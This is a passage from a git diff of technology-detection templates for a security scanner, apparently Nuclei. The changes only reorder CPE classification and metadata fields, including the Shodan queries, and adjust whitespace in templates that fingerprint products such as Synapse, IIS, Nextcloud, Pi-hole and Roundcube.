status:
- 200
-# digest: 490a0046304402200acdc7f786b8e096fd058e601526668418183ee1b87f56230379078322fc28700220599161d4f1f996d3545747f730c3465aedc42bfc25a40499617490737d1b3ad7:922c64590222798bb761d5b6d8e72950
+# digest: 490a0046304402200acdc7f786b8e096fd058e601526668418183ee1b87f56230379078322fc28700220599161d4f1f996d3545747f730c3465aedc42bfc25a40499617490737d1b3ad7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/matrix-homeserver-detect.yaml b/http/technologies/matrix-homeserver-detect.yaml
index 06a4821e03..e6131ba93c 100644
--- a/http/technologies/matrix-homeserver-detect.yaml
+++ b/http/technologies/matrix-homeserver-detect.yaml
@@ -6,16 +6,16 @@ info:
severity: info
description: |
Extract the Matrix homeserver name and version
+ classification:
+ cpe: cpe:2.3:a:matrix:synapse:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"Synapse is running"
- product: synapse
vendor: matrix
+ product: synapse
+ shodan-query: title:"Synapse is running"
tags: tech,matrix,synapse
- classification:
- cpe: cpe:2.3:a:matrix:synapse:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -23,7 +23,6 @@ http:
redirects: true
max-redirects: 2
-
matchers:
- type: word
part: body
@@ -38,4 +37,5 @@ http:
part: body
json:
- '.server | select((.name != null) and (.version != null)) | .name, .version'
-# digest: 4a0a0047304502203e1ffa3c5daae7131064e90d6ef6c55e18e48adb8062b670833ad61902a3d87a022100f9a08b0c7c808f73b24041638cfcbca7eef9289d26402551967c25c1a3a41e92:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a0047304502203e1ffa3c5daae7131064e90d6ef6c55e18e48adb8062b670833ad61902a3d87a022100f9a08b0c7c808f73b24041638cfcbca7eef9289d26402551967c25c1a3a41e92:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/microsoft-iis-8.yaml b/http/technologies/microsoft-iis-8.yaml
index ac4bc4124a..758121531c 100644
--- a/http/technologies/microsoft-iis-8.yaml
+++ b/http/technologies/microsoft-iis-8.yaml
@@ -4,15 +4,15 @@ info:
name: Microsoft Internet Information Services 8
author: dhiyaneshDK
severity: info
- metadata:
- max-request: 1
- shodan-query: http.title:"Microsoft Internet Information Services 8"
- product: iis
- vendor: microsoft
- tags: tech,iis,microsoft
-
classification:
cpe: cpe:2.3:a:microsoft:iis:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: microsoft
+ product: iis
+ shodan-query: http.title:"Microsoft Internet Information Services 8"
+ tags: tech,iis,microsoft
+
http:
- method: GET
path:
@@ -28,4 +28,4 @@ http:
words:
- "Microsoft Internet Information Services 8 "
-# digest: 490a0046304402207c703cffd4b0a0a9b0705df59cbf2e08ab5fbdd4a4bc5acbb80d5582d24de389022057bff6dddbcfffe322a128456fa490f1ec65aa458e358bee8396123d5823b07f:922c64590222798bb761d5b6d8e72950
+# digest: 490a0046304402207c703cffd4b0a0a9b0705df59cbf2e08ab5fbdd4a4bc5acbb80d5582d24de389022057bff6dddbcfffe322a128456fa490f1ec65aa458e358bee8396123d5823b07f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/microsoft/default-iis7-page.yaml b/http/technologies/microsoft/default-iis7-page.yaml
index 1ee69be51c..8ade3d2d32 100644
--- a/http/technologies/microsoft/default-iis7-page.yaml
+++ b/http/technologies/microsoft/default-iis7-page.yaml
@@ -4,15 +4,15 @@ info:
name: IIS-7 Default Page
author: dhiyaneshDk
severity: info
- metadata:
- max-request: 1
- shodan-query: http.title:"IIS7"
- product: iis
- vendor: microsoft
- tags: tech,iis
-
classification:
cpe: cpe:2.3:a:microsoft:iis:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: microsoft
+ product: iis
+ shodan-query: http.title:"IIS7"
+ tags: tech,iis
+
http:
- method: GET
path:
@@ -24,4 +24,4 @@ http:
- "IIS7 "
part: body
-# digest: 490a004630440220106df1c73bb800bbeb3c95691cf354e888a39edfd1692f782be86ee5f84ddfc20220661ee4cd518f5840ebf89411b89bfb4d90c1482db4f4ab073464abbb2d77c6de:922c64590222798bb761d5b6d8e72950
+# digest: 490a004630440220106df1c73bb800bbeb3c95691cf354e888a39edfd1692f782be86ee5f84ddfc20220661ee4cd518f5840ebf89411b89bfb4d90c1482db4f4ab073464abbb2d77c6de:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/microsoft/default-microsoft-azure-page.yaml b/http/technologies/microsoft/default-microsoft-azure-page.yaml
index 4a43422305..89d77066c4 100644
--- a/http/technologies/microsoft/default-microsoft-azure-page.yaml
+++ b/http/technologies/microsoft/default-microsoft-azure-page.yaml
@@ -4,15 +4,15 @@ info:
name: Microsoft Azure Default Page
author: dhiyaneshDk
severity: info
- metadata:
- max-request: 1
- shodan-query: http.title:"Microsoft Azure App Service - Welcome"
- product: azure
- vendor: microsoft
- tags: tech,azure,microsoft
-
classification:
cpe: cpe:2.3:a:microsoft:azure:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: microsoft
+ product: azure
+ shodan-query: http.title:"Microsoft Azure App Service - Welcome"
+ tags: tech,azure,microsoft
+
http:
- method: GET
path:
@@ -24,4 +24,4 @@ http:
- "Microsoft Azure App Service - Welcome "
part: body
-# digest: 490a0046304402207330c24a54f08d2ae9c282a9480d08b071f4334fa68d0fb4628e583e3d3f49cb0220783f449dcfd51a1ee6d4a35372a929f9848443c184a593d1decda27cd4158615:922c64590222798bb761d5b6d8e72950
+# digest: 490a0046304402207330c24a54f08d2ae9c282a9480d08b071f4334fa68d0fb4628e583e3d3f49cb0220783f449dcfd51a1ee6d4a35372a929f9848443c184a593d1decda27cd4158615:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/microsoft/default-windows-server-page.yaml b/http/technologies/microsoft/default-windows-server-page.yaml
index 494fc15f59..9df1210a59 100644
--- a/http/technologies/microsoft/default-windows-server-page.yaml
+++ b/http/technologies/microsoft/default-windows-server-page.yaml
@@ -4,15 +4,15 @@ info:
name: IIS Windows Server Default Page
author: dhiyaneshDk
severity: info
- metadata:
- max-request: 1
- shodan-query: http.title:"IIS Windows Server"
- product: windows_server_2003
- vendor: microsoft
- tags: tech,windows,iis
-
classification:
cpe: cpe:2.3:o:microsoft:windows_server_2003:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: microsoft
+ product: windows_server_2003
+ shodan-query: http.title:"IIS Windows Server"
+ tags: tech,windows,iis
+
http:
- method: GET
path:
@@ -24,4 +24,4 @@ http:
- "IIS Windows Server "
part: body
-# digest: 4a0a0047304502205f5a3ebc04457be48e6870581f21363f659847cbe306fd2217e3e6a723da7fa4022100c16034e650054918571fec4854471d6c6356fce16d97665b64f9e3879fb7e242:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502205f5a3ebc04457be48e6870581f21363f659847cbe306fd2217e3e6a723da7fa4022100c16034e650054918571fec4854471d6c6356fce16d97665b64f9e3879fb7e242:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/mikrotik-httpproxy.yaml b/http/technologies/mikrotik-httpproxy.yaml
index 966a495d6d..9e7828fd74 100644
--- a/http/technologies/mikrotik-httpproxy.yaml
+++ b/http/technologies/mikrotik-httpproxy.yaml
@@ -4,16 +4,16 @@ info:
name: MikroTik httpproxy
author: its0x08,DhiyaneshDk
severity: info
+ classification:
+ cpe: cpe:2.3:h:mikrotik:rb3011uias-rm:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: 'Server: mikrotik httpproxy'
- product: rb3011uias-rm
vendor: mikrotik
+ product: rb3011uias-rm
+ shodan-query: 'Server: mikrotik httpproxy'
tags: tech,mikrotik
- classification:
- cpe: cpe:2.3:h:mikrotik:rb3011uias-rm:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -27,4 +27,4 @@ http:
- 'Server: Mikrotik HttpProxy'
case-insensitive: true
-# digest: 4a0a00473045022100e6cbe098b53eec4939795027f80f066d6767ce73bb350fe390324598a24fbe43022058cd7075662f7ce30bfbff210f10fa8ddb7b80e7a194dca72ab97e4e6791ff10:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100e6cbe098b53eec4939795027f80f066d6767ce73bb350fe390324598a24fbe43022058cd7075662f7ce30bfbff210f10fa8ddb7b80e7a194dca72ab97e4e6791ff10:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/mongoose-server.yaml b/http/technologies/mongoose-server.yaml
index a7e83405b7..41540bfc16 100644
--- a/http/technologies/mongoose-server.yaml
+++ b/http/technologies/mongoose-server.yaml
@@ -8,16 +8,16 @@ info:
Mongoose is a embedded web server
reference:
- https://github.com/cesanta/mongoose
+ classification:
+ cpe: cpe:2.3:a:cesanta:mongoose:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: 'Server: Mongoose'
- product: mongoose
vendor: cesanta
+ product: mongoose
+ shodan-query: 'Server: Mongoose'
tags: tech,mongoose
- classification:
- cpe: cpe:2.3:a:cesanta:mongoose:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -34,4 +34,4 @@ http:
status:
- 200
-# digest: 490a0046304402205facb55edb39813cbf3fe7a9b84fac40471c8cced8bc6b16ff65f466c218e18f02206528133c2c8aa9306ddb5986e0a9044827e02513ca6737e2c7bc512147926ed4:922c64590222798bb761d5b6d8e72950
+# digest: 490a0046304402205facb55edb39813cbf3fe7a9b84fac40471c8cced8bc6b16ff65f466c218e18f02206528133c2c8aa9306ddb5986e0a9044827e02513ca6737e2c7bc512147926ed4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/moveit-transfer-detect.yaml b/http/technologies/moveit-transfer-detect.yaml
index 63774913af..4edd81cdef 100644
--- a/http/technologies/moveit-transfer-detect.yaml
+++ b/http/technologies/moveit-transfer-detect.yaml
@@ -4,16 +4,16 @@ info:
name: Moveit File Transfer - Detect
author: tess
severity: info
+ classification:
+ cpe: cpe:2.3:a:progress:moveit_transfer:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
- shodan-query: html:"human.aspx"
- product: moveit_transfer
vendor: progress
+ product: moveit_transfer
+ shodan-query: html:"human.aspx"
tags: tech,moveit
- classification:
- cpe: cpe:2.3:a:progress:moveit_transfer:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -38,4 +38,4 @@ http:
status:
- 200
-# digest: 4a0a00473045022100ce8b47477d2640d59a6879906574e3c628b07f4bc38a61a385b239d74453f34d02204c1c027d84cf76e60e97f36e85c084ceee87102e9a83b6363e1b6508ecaa6a6a:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100ce8b47477d2640d59a6879906574e3c628b07f4bc38a61a385b239d74453f34d02204c1c027d84cf76e60e97f36e85c084ceee87102e9a83b6363e1b6508ecaa6a6a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/nextcloud-detect.yaml b/http/technologies/nextcloud-detect.yaml
index 27b8824455..40f6042fe6 100644
--- a/http/technologies/nextcloud-detect.yaml
+++ b/http/technologies/nextcloud-detect.yaml
@@ -8,16 +8,16 @@ info:
Nextcloud is a suite of client-server software for creating and using file hosting services
reference:
- https://nextcloud.com
+ classification:
+ cpe: cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 4
- shodan-query: http.title:"Nextcloud"
- product: nextcloud_server
vendor: nextcloud
+ product: nextcloud_server
+ shodan-query: http.title:"Nextcloud"
tags: tech,nextcloud,storage
- classification:
- cpe: cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -49,4 +49,4 @@ http:
regex:
- '(?m)"version":"([0-9.]+)",'
-# digest: 4a0a00473045022100938d847bcc0b475ce2db2df8e93fd72beee7d2c05e3bbbfc840ca2c2a18d9fc202207734d0da58a3f16e28e0b30902d898f0e7f4b8f86b4b583c684b807a199013c0:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100938d847bcc0b475ce2db2df8e93fd72beee7d2c05e3bbbfc840ca2c2a18d9fc202207734d0da58a3f16e28e0b30902d898f0e7f4b8f86b4b583c684b807a199013c0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/nextcloud-owncloud-detect.yaml b/http/technologies/nextcloud-owncloud-detect.yaml
index 0ecd99d44f..1fd832ba7c 100644
--- a/http/technologies/nextcloud-owncloud-detect.yaml
+++ b/http/technologies/nextcloud-owncloud-detect.yaml
@@ -4,16 +4,16 @@ info:
name: Owncloud StatusPage detection
author: myztique,invisiblethreat
severity: info
+ classification:
+ cpe: cpe:2.3:a:owncloud:owncloud:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.html:"owncloud"
- product: owncloud
vendor: owncloud
+ product: owncloud
+ shodan-query: http.html:"owncloud"
tags: tech,owncloud,status
- classification:
- cpe: cpe:2.3:a:owncloud:owncloud:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -32,4 +32,5 @@ http:
- type: json
json:
- .version
-# digest: 490a004630440220740dda35113ef3bee6f0e7b482c1610bee7a6241dfae549e0861eac1f245cb8502200819eae06d45104e3870e12454721296efc0e4ca0abbea217e1303ef840e1933:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a004630440220740dda35113ef3bee6f0e7b482c1610bee7a6241dfae549e0861eac1f245cb8502200819eae06d45104e3870e12454721296efc0e4ca0abbea217e1303ef840e1933:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/nexus-detect.yaml b/http/technologies/nexus-detect.yaml
index 194d64704c..515ac9f11d 100644
--- a/http/technologies/nexus-detect.yaml
+++ b/http/technologies/nexus-detect.yaml
@@ -6,16 +6,16 @@ info:
severity: info
description: |
Try to detect the presence of a NRM instance via the REST API OpenDocument descriptor.
+ classification:
+ cpe: cpe:2.3:a:sonatype:nexus_repository_manager:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.html:"Nexus Repository Manager"
- product: nexus_repository_manager
vendor: sonatype
+ product: nexus_repository_manager
+ shodan-query: http.html:"Nexus Repository Manager"
tags: tech,nexus
- classification:
- cpe: cpe:2.3:a:sonatype:nexus_repository_manager:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -31,4 +31,4 @@ http:
status:
- 200
-# digest: 490a00463044022075020f3559219198e725c4825133fd0b11ace23039e4af75f3e61d5617989a8a022029d07b425c608d2851b865ec5f08e13de5357ca1e2b03526ae890beb6747737a:922c64590222798bb761d5b6d8e72950
+# digest: 490a00463044022075020f3559219198e725c4825133fd0b11ace23039e4af75f3e61d5617989a8a022029d07b425c608d2851b865ec5f08e13de5357ca1e2b03526ae890beb6747737a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/notion-detect.yaml b/http/technologies/notion-detect.yaml
index ec500901bf..1e7312a0f2 100644
--- a/http/technologies/notion-detect.yaml
+++ b/http/technologies/notion-detect.yaml
@@ -4,16 +4,16 @@ info:
name: Notion Detect
author: tess
severity: info
+ classification:
+ cpe: cpe:2.3:a:notion:notion:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"Notion – One workspace. Every team."
- product: notion
vendor: notion
+ product: notion
+ shodan-query: title:"Notion – One workspace. Every team."
tags: notion,tech
- classification:
- cpe: cpe:2.3:a:notion:notion:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -32,4 +32,4 @@ http:
status:
- 200
-# digest: 490a0046304402205cd92659d7d1c758ad8d1b701baeedc9bc8de2a30599f3c8e294c11b64a3d6d302202ba5f4ed9df1051dcb55c431313a99d513136b40bfb5b2216005ad2077ad260b:922c64590222798bb761d5b6d8e72950
+# digest: 490a0046304402205cd92659d7d1c758ad8d1b701baeedc9bc8de2a30599f3c8e294c11b64a3d6d302202ba5f4ed9df1051dcb55c431313a99d513136b40bfb5b2216005ad2077ad260b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/open-journal-systems.yaml b/http/technologies/open-journal-systems.yaml
index c19a053f07..73bbc9a48c 100644
--- a/http/technologies/open-journal-systems.yaml
+++ b/http/technologies/open-journal-systems.yaml
@@ -7,16 +7,16 @@ info:
description: Open Journal Systems, also known as OJS, is a free software for the management of peer-reviewed academic journals, created by the Public Knowledge Project.
reference:
- https://pkp.sfu.ca/ojs/
+ classification:
+ cpe: cpe:2.3:a:openjournalsystems:open_journal_systems:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: html:"Open Journal Systems"
- product: open_journal_systems
vendor: openjournalsystems
+ product: open_journal_systems
+ shodan-query: html:"Open Journal Systems"
tags: tech,ojs
- classification:
- cpe: cpe:2.3:a:openjournalsystems:open_journal_systems:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -43,4 +43,4 @@ http:
regex:
- '(?i).*'
-# digest: 4b0a00483046022100edfa90d95a16e5ad6dbbc7aa6599860dffea77af40508e1438c3f1fce891fc44022100d44e634080a7f3d35f606f9f8adf3e28e9ba8a1344ccd2e83e3dba541691b09a:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100edfa90d95a16e5ad6dbbc7aa6599860dffea77af40508e1438c3f1fce891fc44022100d44e634080a7f3d35f606f9f8adf3e28e9ba8a1344ccd2e83e3dba541691b09a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/pexip-detect.yaml b/http/technologies/pexip-detect.yaml
index bd98695b84..aae3f1c38c 100644
--- a/http/technologies/pexip-detect.yaml
+++ b/http/technologies/pexip-detect.yaml
@@ -8,16 +8,16 @@ info:
Pexip technology was detected.
reference:
- https://www.pexip.com/
+ classification:
+ cpe: cpe:2.3:a:pexip:pexip_infinity:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.title:"Pexip Connect for Web"
- product: pexip_infinity
vendor: pexip
+ product: pexip_infinity
+ shodan-query: http.title:"Pexip Connect for Web"
tags: tech,pexip,detect
- classification:
- cpe: cpe:2.3:a:pexip:pexip_infinity:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -31,4 +31,5 @@ http:
- 'status_code == 200'
- 'contains(body, "Pexip Connect for Web")'
condition: and
-# digest: 4a0a00473045022100af90ef4c39425515f15c2a49b1dd07e74bd26aba0fd5b7fdf4de51affef88aa7022030abc0a04cf5ed0a09b15afb4369b37bd3c3ccb275ae30cb4315691302e28aa0:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100af90ef4c39425515f15c2a49b1dd07e74bd26aba0fd5b7fdf4de51affef88aa7022030abc0a04cf5ed0a09b15afb4369b37bd3c3ccb275ae30cb4315691302e28aa0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/php-detect.yaml b/http/technologies/php-detect.yaml
index 65d194988d..508bfec718 100644
--- a/http/technologies/php-detect.yaml
+++ b/http/technologies/php-detect.yaml
@@ -4,16 +4,16 @@ info:
name: PHP Detect
author: y0no
severity: info
+ classification:
+ cpe: cpe:2.3:a:php:php:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: "X-Powered-By: PHP"
- product: php
vendor: php
+ product: php
+ shodan-query: "X-Powered-By: PHP"
tags: tech,php
- classification:
- cpe: cpe:2.3:a:php:php:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -37,4 +37,4 @@ http:
regex:
- "X-Powered-By: PHP/([0-9.]+)"
-# digest: 4a0a00473045022021b5a2388194fe5e59ae13ee2b2ee1bbdeb8f2f1f1e38184c16fa43d18d722a7022100ab79d74f3b461c9665ec30d646ad1b187c83731579a582e46f5e0107e6957a59:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022021b5a2388194fe5e59ae13ee2b2ee1bbdeb8f2f1f1e38184c16fa43d18d722a7022100ab79d74f3b461c9665ec30d646ad1b187c83731579a582e46f5e0107e6957a59:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/php-fusion-detect.yaml b/http/technologies/php-fusion-detect.yaml
index 4acdcb1044..03f56b4d2a 100644
--- a/http/technologies/php-fusion-detect.yaml
+++ b/http/technologies/php-fusion-detect.yaml
@@ -4,15 +4,15 @@ info:
name: PHP Fusion Detect
author: pikpikcu
severity: info
- metadata:
- max-request: 1
- fofa-query: title="PHP-Fusion"
- product: php-fusion
- vendor: php-fusion
- tags: php,tech,php-fusion
-
classification:
cpe: cpe:2.3:a:php-fusion:php-fusion:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: php-fusion
+ product: php-fusion
+ fofa-query: title="PHP-Fusion"
+ tags: php,tech,php-fusion
+
http:
- method: GET
path:
@@ -32,4 +32,4 @@ http:
status:
- 200
-# digest: 490a004630440220026b8c32a04a1df62ff2fe2fdbac75bbb8a0a0eaaa4b7f20f513e433f2dd56f20220517dfc1f2e3c46ee33743cbeaae7d56911292900234ecc543e18b715576ec448:922c64590222798bb761d5b6d8e72950
+# digest: 490a004630440220026b8c32a04a1df62ff2fe2fdbac75bbb8a0a0eaaa4b7f20f513e433f2dd56f20220517dfc1f2e3c46ee33743cbeaae7d56911292900234ecc543e18b715576ec448:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/phplist-detect.yaml b/http/technologies/phplist-detect.yaml
index 587d63f0f0..96329d6497 100644
--- a/http/technologies/phplist-detect.yaml
+++ b/http/technologies/phplist-detect.yaml
@@ -8,16 +8,16 @@ info:
phpList is an open source newsletter manager.
reference:
- https://www.phplist.org/
+ classification:
+ cpe: cpe:2.3:a:phplist:phplist:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: html:"phplist"
- product: phplist
vendor: phplist
+ product: phplist
+ shodan-query: html:"phplist"
tags: tech,phplist,detect
- classification:
- cpe: cpe:2.3:a:phplist:phplist:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -43,4 +43,4 @@ http:
regex:
- '(?i)version.((\d\.?)+)'
-# digest: 4b0a00483046022100b9689d0d38d96a02736636f6b53b41e7c80d65679297db556f6cc0eea8c2417c022100bbdd5891a3b8f5a2ac5070c9420030c82f3bbfcd1d405bf0403634c13c695a61:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100b9689d0d38d96a02736636f6b53b41e7c80d65679297db556f6cc0eea8c2417c022100bbdd5891a3b8f5a2ac5070c9420030c82f3bbfcd1d405bf0403634c13c695a61:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/pi-hole-detect.yaml b/http/technologies/pi-hole-detect.yaml
index 7468868d29..5968955752 100644
--- a/http/technologies/pi-hole-detect.yaml
+++ b/http/technologies/pi-hole-detect.yaml
@@ -4,16 +4,16 @@ info:
name: Pi-hole Login Panel - Detect
author: geeknik
severity: info
+ classification:
+ cpe: cpe:2.3:a:pi-hole:pi-hole:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 5
- shodan-query: title:"Pi-hole"
- product: pi-hole
vendor: pi-hole
+ product: pi-hole
+ shodan-query: title:"Pi-hole"
tags: tech,pihole,detect
- classification:
- cpe: cpe:2.3:a:pi-hole:pi-hole:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -46,4 +46,4 @@ http:
- 'sudo pihole -a -p
'
condition: or
-# digest: 4a0a004730450221009511ed20ff8a713868173492874903c4b35a6b12b75b7e269d9214761e78a3d902203e3ab0c415a7ae733830279981ab17b3f79b579eefad7d501ed415147f7ed15d:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a004730450221009511ed20ff8a713868173492874903c4b35a6b12b75b7e269d9214761e78a3d902203e3ab0c415a7ae733830279981ab17b3f79b579eefad7d501ed415147f7ed15d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/prestashop-detect.yaml b/http/technologies/prestashop-detect.yaml
index 5bee19282e..d7b4e39ef8 100644
--- a/http/technologies/prestashop-detect.yaml
+++ b/http/technologies/prestashop-detect.yaml
@@ -4,15 +4,15 @@ info:
name: PrestaShop Tech Detection
author: pdteam
severity: info
- metadata:
- max-request: 1
- shodan-query: http.component:"PrestaShop"
- product: prestashop
- vendor: prestashop
- tags: tech,cms,prestashop
-
classification:
cpe: cpe:2.3:a:prestashop:prestashop:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: prestashop
+ product: prestashop
+ shodan-query: http.component:"PrestaShop"
+ tags: tech,cms,prestashop
+
http:
- method: GET
path:
@@ -29,4 +29,4 @@ http:
-
condition: or
-# digest: 4a0a00473045022100aa670ea1eb9e839c6b4137d2b9c18582caf4785c1330d4cd45ea719821a3cb2d0220048dc0c167ede9836ccc1f5825e83f7316c440865ab72b6abbe86d5ba8e5189c:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100aa670ea1eb9e839c6b4137d2b9c18582caf4785c1330d4cd45ea719821a3cb2d0220048dc0c167ede9836ccc1f5825e83f7316c440865ab72b6abbe86d5ba8e5189c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/privatebin-detect.yaml b/http/technologies/privatebin-detect.yaml
index 696c6bded2..7ef5c6e02a 100644
--- a/http/technologies/privatebin-detect.yaml
+++ b/http/technologies/privatebin-detect.yaml
@@ -8,16 +8,16 @@ info:
PrivateBin was detected.
reference:
- https://privatebin.info/
+ classification:
+ cpe: cpe:2.3:a:privatebin:privatebin:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"PrivateBin"
- product: privatebin
vendor: privatebin
+ product: privatebin
+ shodan-query: title:"PrivateBin"
tags: tech,privatebin,detect
- classification:
- cpe: cpe:2.3:a:privatebin:privatebin:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -25,7 +25,6 @@ http:
redirects: true
max-redirects: 2
-
matchers:
- type: dsl
dsl:
@@ -39,4 +38,5 @@ http:
group: 1
regex:
- 'privatebin\.[a-z]{2,3}\?([0-9.]+)'
-# digest: 4a0a0047304502206c206521a18dcd4cbf7969b932bde363b8a28fd9e14a007680371285886235920221008efa426ddef32b50823c5167f532ec7462c91ed4ec6a62ef841eec9e5451a632:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a0047304502206c206521a18dcd4cbf7969b932bde363b8a28fd9e14a007680371285886235920221008efa426ddef32b50823c5167f532ec7462c91ed4ec6a62ef841eec9e5451a632:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/pypiserver-detect.yaml b/http/technologies/pypiserver-detect.yaml
index 64540cb611..e2d2d69a76 100644
--- a/http/technologies/pypiserver-detect.yaml
+++ b/http/technologies/pypiserver-detect.yaml
@@ -4,16 +4,16 @@ info:
name: PyPI Server Detect
author: ritikchaddha
severity: info
+ classification:
+ cpe: cpe:2.3:a:python:pypiserver:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: html:"pypiserver"
- product: pypiserver
vendor: python
+ product: pypiserver
+ shodan-query: html:"pypiserver"
tags: tech,pypiserver
- classification:
- cpe: cpe:2.3:a:python:pypiserver:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -30,4 +30,4 @@ http:
status:
- 200
-# digest: 4b0a00483046022100fc44bde578f2b819b0c96d48de1a86c508e6ef8d52046eb98329838828665114022100baca4486225d0b9c20fed6b873155c1f7f3eae449f11af59165f48aebdaf8c36:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100fc44bde578f2b819b0c96d48de1a86c508e6ef8d52046eb98329838828665114022100baca4486225d0b9c20fed6b873155c1f7f3eae449f11af59165f48aebdaf8c36:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/roundcube-webmail-portal.yaml b/http/technologies/roundcube-webmail-portal.yaml
index ec104fbe4c..38c334294e 100644
--- a/http/technologies/roundcube-webmail-portal.yaml
+++ b/http/technologies/roundcube-webmail-portal.yaml
@@ -4,15 +4,15 @@ info:
name: Roundcube webmail
author: ritikchaddha
severity: info
- metadata:
- max-request: 2
- shodan-query: http.component:"RoundCube"
- product: webmail
- vendor: roundcube
- tags: roundcube,portal,tech
-
classification:
cpe: cpe:2.3:a:roundcube:webmail:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 2
+ vendor: roundcube
+ product: webmail
+ shodan-query: http.component:"RoundCube"
+ tags: roundcube,portal,tech
+
http:
- method: GET
path:
@@ -34,4 +34,4 @@ http:
status:
- 200
-# digest: 4a0a00473045022100cc0fcb584c07dc0e6c7a86e20ded10bf65da2c31d36dd1f0bb1dcc52c576c19d02207201127b2fb95b43564d996fd5affa82ef7b95645890a5ce2a82737752d1520a:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100cc0fcb584c07dc0e6c7a86e20ded10bf65da2c31d36dd1f0bb1dcc52c576c19d02207201127b2fb95b43564d996fd5affa82ef7b95645890a5ce2a82737752d1520a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/rseenet-detect.yaml b/http/technologies/rseenet-detect.yaml
index d794cb9861..6e41d3a00e 100644
--- a/http/technologies/rseenet-detect.yaml
+++ b/http/technologies/rseenet-detect.yaml
@@ -6,6 +6,8 @@ info:
severity: info
reference:
- https://icr.advantech.cz/products/software/r-seenet
+ classification:
+ cpe: cpe:2.3:a:advantech:r-seenet:*:*:*:*:*:*:*:*
metadata:
max-request: 1
shodan-query: http.title:"R-SeeNet"
@@ -13,8 +15,6 @@ info:
vendor: advantech
